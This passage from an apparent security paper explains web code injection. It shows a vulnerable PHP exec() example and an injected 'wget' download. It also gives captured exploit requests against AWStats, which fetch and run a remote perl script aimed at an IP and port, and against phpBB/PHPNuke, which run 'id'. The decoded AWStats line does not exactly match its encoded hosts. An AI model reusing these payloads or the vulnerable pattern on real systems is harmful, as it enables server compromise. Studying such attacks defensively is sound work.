Code Injection

Code injection is one such attack, which exploits a web application's interface to the underlying operating system and results in the execution of arbitrary code. A simple example of a PHP code injection attack follows:

$yourName = $_GET['name'];
exec("echo $yourName");

Directing a web browser to this application at the URL "application.php?name=Magoo" would result in the display of a webpage containing the word "Magoo". However, using the characters "Magoo; wget 1.2.3.4/toolkit.c" would execute two statements within the exec() function. The second statement is a malicious attempt to download a file to the victim host. A vulnerability similar to this was present in some versions of the Advanced Web Statistics (AWStats) script, a popular application used for summarizing information about visitors to a web site. This vulnerability has been widely abused by several worms, including Lupper. Note that AWStats is written in Perl so the problems we describe are by no means unique to PHP.

To quote from the iDEFENSE advisory :

"The problem specifically exists when the application is running as a CGI script on a web server. The "configdir" parameter contains unfiltered user-supplied data that is utilized in a call to the Perl routine open() as can be seen here on line 1082 of awstats.pl:

if (open(CONFIG,"$searchdir$PROG.$SiteConfig.conf"))


The "searchdir" variables hold the value of the parameter provided by the attacker from "configdir." An attacker can cause arbitrary commands to be executed by prefixing them with the "|" character."

In the case of the following attempted exploit:

GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bwget%20http%3a%2f%2f10%2e58%2e26%2e26%2flibsh%2fping%2etxt%3bmv%20ping%2etxt%20temp2006%3bperl%20temp2006%20210%2e245%2e233%2e251%208080...

we end up with:

 
if (open(CONFIG,"|echo ;echo b_exp;wget http://10.0.26.26/libsh/ping.txt;mv ping.txt temp2006;perl temp2006 10.0.233.251 8080...";))

which leads to the execution of the attacker's commands, because of the way perl's 'open()' function works. It seems as if the 'echo b_exp' at the start and a corresponding 'echo e_exp' at the end is intended to simplify parsing of the resulting web page, as in the this published exploit.

The PHPBB vulnerability that was exploited by the Santy worm was a problem of this type. PHPBB is a bulletin board written in PHP which allows users to post and reply to messages about various topics. A Google search for PHPBB reveals around 1.5 million sites at the time of writing. The Santy worm initially attempted to exploit the viewtopic.php vulnerability with a small test payload, simply printing out a particular piece of text. If the resulting web page contained the supplied text, the worm would launch its propagation code. (Eventually Google began to block Santy's queries.) The following is an example of an attack observed against PHPNuke which attempts to run the 'id' command. It is a maliciously crafted HTTP GET request:

GET /phpnuke/modules.php?name=Forums&file=viewtopic&t=4&&highlight=%2527.$poster=%60id%60.%2527
.

The 'id' command identifies the current user and seems to be often used to test command injection issues, as the results of a successful test are easily identifiable. The vulnerability itself appears to be the phpBB Remote Command Execution (Viewtopic.php Highlight) issue which we discuss later. PHPNuke has included PHPBB for its forums "starting from somewhere around v. 6.5"